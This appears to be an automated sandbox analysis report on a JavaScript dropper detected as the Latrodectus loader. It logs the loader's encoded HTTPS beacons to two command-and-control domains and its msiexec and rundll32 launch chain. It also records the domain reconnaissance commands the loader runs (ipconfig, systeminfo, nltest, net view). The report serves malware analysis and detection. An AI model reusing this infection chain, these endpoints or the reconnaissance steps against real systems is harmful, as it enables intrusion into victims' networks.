Apr 25, 2024 22:47:45.340018034 CEST	1289	IN	Data Raw: 20 70 61 72 65 6e 74 20 64 69 72 65 63 74 6f 72 79 2e 20 41 20 72 65 63 6f 72 64 20 70 61 72 65 6e 74 65 64 20 74 6f 20 69 74 73 65 6c 66 20 6f 72 20 77 69 74 68 20 61 20 4e 75 6c 6c 20 70 61 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 73 20 61 20 Data Ascii: parent directory. A record parented to itself or with a Null parent represents a root of the install tree.DefaultDirThe default sub-path under parent's path.Integer error number, obtained from header file IError(...) macros.A foreign key to t

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49717	172.67.136.103	443	4012	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:49:20 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 252 Cache-Control: no-cache
2024-04-25 20:49:20 UTC	252	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 4d 57 35 52 36 37 38 4b 43 6a 57 52 43 4f 49 37 71 41 37 31 63 74 77 39 4b 43 6c 63 51 48 6d 6e 44 58 41 4f 43 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c 44 34 34 36 7a 6b 6c 57 6a 51 57 64 6d 37 44 7a 2f 4a 6a 49 30 4c 59 50 48 4a 51 6c 77 35 62 79 6a 5a 4c 30 76 38 45 63 32 62 47 74 6a 38 65 4f 48 65 6e 72 57 4f 52 31 52 4e 48 48 4d 35 72 4a 53 42 39 44 57 51 3d 3d Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiC0MW5R678KCjWRCOI7qA71ctw9KClcQHmnDXAOCBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uLD446zklWjQWdm7Dz/JjI0LYPHJQlw5byjZL0v8Ec2bGtj8eOHenrWOR1RNHHM5rJSB9DWQ==
2024-04-25 20:49:23 UTC	574	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:49:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiEpstHwa42P5w1zb56SXfI0Lp%2FiR%2FOXGJhNj%2Fqni5AstFZgWZkHkb68nQmK8J70i4oBL%2FuaLIGUNjLrR6wiE1AYMQIn0f4tbA9YWB8e3uvV3ymDccjRPBADNKzmPZWYPNwb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a132f6dda8b030-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:49:23 UTC	26	IN	Data Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a Data Ascii: 14QhOmMB2npTVqDJOocQ==
2024-04-25 20:49:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49718	172.67.136.103	443	4012	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:49:26 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-25 20:49:26 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 71 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 4d 57 35 52 36 37 38 4b 43 6a 57 52 43 4f 49 37 71 41 37 31 63 74 77 39 4b 43 6c 63 51 48 6d 6e 44 58 41 4f 43 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiC0MW5R678KCjWRCOI7qA71ctw9KClcQHmnDXAOCBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-25 20:49:31 UTC	572	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:49:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bd%2Ftj7fZNctBTAqyc9ZvZ8lHhVssMPrPgP3IwMEoE2AgVqVHGIunpnKKZuttn8z2wrUSr3SFsGFpgEPHZekePAj5pKKt%2BaHpjYn1wa4LRXcnRAAtGo47U0%2FiukrfRbQhlOpV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a1331f485fada0-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:49:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49719	172.67.136.103	443	4012	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:49:32 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-25 20:49:32 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 4d 57 35 52 36 37 38 4b 43 6a 57 52 43 4f 49 37 71 41 37 31 63 74 77 39 4b 43 6c 63 51 48 6d 6e 44 58 41 4f 43 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RpE5vcC/HWCbEd2NSiC0MW5R678KCjWRCOI7qA71ctw9KClcQHmnDXAOCBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-25 20:49:43 UTC	568	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:49:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3BDRcoyfq0BpLT9EjZHE1UxqtQYMRXpTlLHnnaf%2BKAZ45hL7UbGADxy1cBlvtV16ygb6UlTKOt30kDV99rzvRjI00QcUm2cmjfX7BYdv4Bu7NldtpL4mskt8UZ922459Bdi4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a1334168b3457d-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:49:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49720	172.67.136.103	443	4012	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:49:44 UTC	229	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: jarinamaers.shop Content-Length: 180 Cache-Control: no-cache
2024-04-25 20:49:44 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 6f 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 4d 57 35 52 36 37 38 4b 43 6a 57 52 43 4f 49 37 71 41 37 31 63 74 77 39 4b 43 6c 63 51 48 6d 6e 44 58 41 4f 43 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 72 37 4c 36 79 62 6c 6c 4a 32 69 59 39 6f 55 48 49 46 33 75 4c Data Ascii: YjOeEyiMk3RoE5vcC/HWCbEd2NSiC0MW5R678KCjWRCOI7qA71ctw9KClcQHmnDXAOCBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49far7L6ybllJ2iY9oUHIF3uL
2024-04-25 20:49:50 UTC	580	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:49:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2BIZauoLiDW2cspO1d1HKgcz%2FqBcRbyRcdowOz5DS%2FX%2BkEo51d37x1Rmv6ALNpToQg%2BZGaUPyBpzsIveqjNMNWMan5MWSGW%2F250okokNOYUPxf1cVDKWv6je%2FqDjaWVRqt2x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87a1339159ae53b9-ATL alt-svc: h3=":443"; ma=86400
2024-04-25 20:49:50 UTC	162	IN	Data Raw: 39 63 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 69 7a 64 35 5a 48 39 71 74 56 32 58 35 45 38 74 46 4a 69 39 2b 4d 6e 69 58 44 36 41 4a 55 75 7a 5a 4f 2b 2b 42 47 72 63 6e 41 3d 3d 0d 0a Data Ascii: 9cQhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhuizd5ZH9qtV2X5E8tFJi9+MniXD6AJUuzZO++BGrcnA==
2024-04-25 20:49:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49721	104.21.59.82	443	4012	C:\Windows\System32\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-25 20:49:50 UTC	227	OUT	POST /live/ HTTP/1.1 Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: grizmotras.com Content-Length: 180 Cache-Control: no-cache
2024-04-25 20:49:50 UTC	180	OUT	Data Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 76 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 4d 57 35 52 36 37 38 4b 43 6a 57 52 43 4f 49 37 71 41 37 31 63 74 77 39 4b 43 6c 63 51 48 6d 6e 44 58 41 4f 43 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 36 7a 46 72 48 6c 76 49 4a 6a 4a 33 6f 4c 41 55 39 55 73 4d 47 77 59 55 77 78 69 54 6f 52 70 35 44 5a 4f 37 2f 39 66 6a 48 57 47 47 50 42 6a 73 4c 61 57 31 48 32 47 79 34 6b 4a 34 39 66 61 6d 2f 36 57 68 62 56 64 51 79 53 49 38 2f 41 7a 55 45 67 3d 3d Data Ascii: YjOeEyiMk3RvE5vcC/HWCbEd2NSiC0MW5R678KCjWRCOI7qA71ctw9KClcQHmnDXAOCBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjsLaW1H2Gy4kJ49fam/6WhbVdQySI8/AzUEg==

Target ID:	0
Start time:	22:47:41
Start date:	25/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js"
Imagebase:	0x7ff69e1b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:47:43
Start date:	25/04/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff79c150000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	22:47:51
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1
Imagebase:	0x370000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:47:51
Start date:	25/04/2024
Path:	C:\Windows\Installer\MSI3B6A.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0x6f0000
File size:	399'328 bytes
MD5 hash:	B9545ED17695A32FACE8C3408A6A3553
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:47:51
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0xe80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:47:51
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Imagebase:	0x7ff71dd50000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2138417852.00000187EC840000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:47:52
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Imagebase:	0x7ff71dd50000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3125138531.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3337063134.00000201DAAE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3003737067.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3336769043.00000201DA900000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3044326122.00000201DC500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3337150671.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000003.3252768479.00000201DC470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	22:47:53
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Imagebase:	0x7ff71dd50000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2157690960.000001A379500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:48:59
Start date:	25/04/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Imagebase:	0x7ff71dd50000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 0000000B.00000002.2810393919.000001FFB4F00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Analysis Process: cmd.exePID: 5460, Parent PID: 4012

General

Target ID:	12
Start time:	22:49:49
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c ipconfig /all
Imagebase:	0x7ff61d250000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:49:49
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:49:49
Start date:	25/04/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	ipconfig /all
Imagebase:	0x7ff7abce0000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:49:49
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c systeminfo
Imagebase:	0x7ff61d250000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:49:49
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:49:49
Start date:	25/04/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff699c90000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:49:50
Start date:	25/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	22:49:50
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts
Imagebase:	0x7ff61d250000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:49:50
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:49:50
Start date:	25/04/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts
Imagebase:	0x7ff748e30000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:49:50
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c nltest /domain_trusts /all_trusts
Imagebase:	0x7ff61d250000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:49:50
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:49:50
Start date:	25/04/2024
Path:	C:\Windows\System32\nltest.exe
Wow64 process (32bit):	false
Commandline:	nltest /domain_trusts /all_trusts
Imagebase:	0x7ff748e30000
File size:	540'672 bytes
MD5 hash:	70E221CE763EA128DBA484B2E4903DE1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:49:51
Start date:	25/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	/c net view /all /domain
Imagebase:	0x7ff61d250000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	22:49:51
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	22:49:51
Start date:	25/04/2024
Path:	C:\Windows\System32\net.exe
Wow64 process (32bit):	false
Commandline:	net view /all /domain
Imagebase:	0x7ff7a2560000
File size:	59'904 bytes
MD5 hash:	0BD94A338EEA5A4E1F2830AE326E6D19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31%
Total number of Nodes:	323
Total number of Limit Nodes:	7

Executed Functions

Function 006F52F0 Relevance: 58.2, APIs: 16, Strings: 17, Instructions: 402
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 006F549C
GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 006F551D
ShellExecuteExW.SHELL32(?), ref: 006F5601
ShellExecuteExW.SHELL32(?), ref: 006F5637
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 006F567C
GetProcAddress.KERNEL32(00000000), ref: 006F5685
GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 006F5688
AllowSetForegroundWindow.USER32(00000000), ref: 006F568B
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 006F56AB
GetProcAddress.KERNEL32(00000000), ref: 006F56AE
GetProcessId.KERNELBASE(?,?,?,?,?,?,?), ref: 006F56B5
Sleep.KERNELBASE(00000064,?,?,?,?,?,?), ref: 006F56CA
EnumWindows.USER32(006F5830,?), ref: 006F56DF
BringWindowToTop.USER32(00000000), ref: 006F56F4
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 006F5711
GetExitCodeProcess.KERNELBASE(?,?), ref: 006F571B

Strings

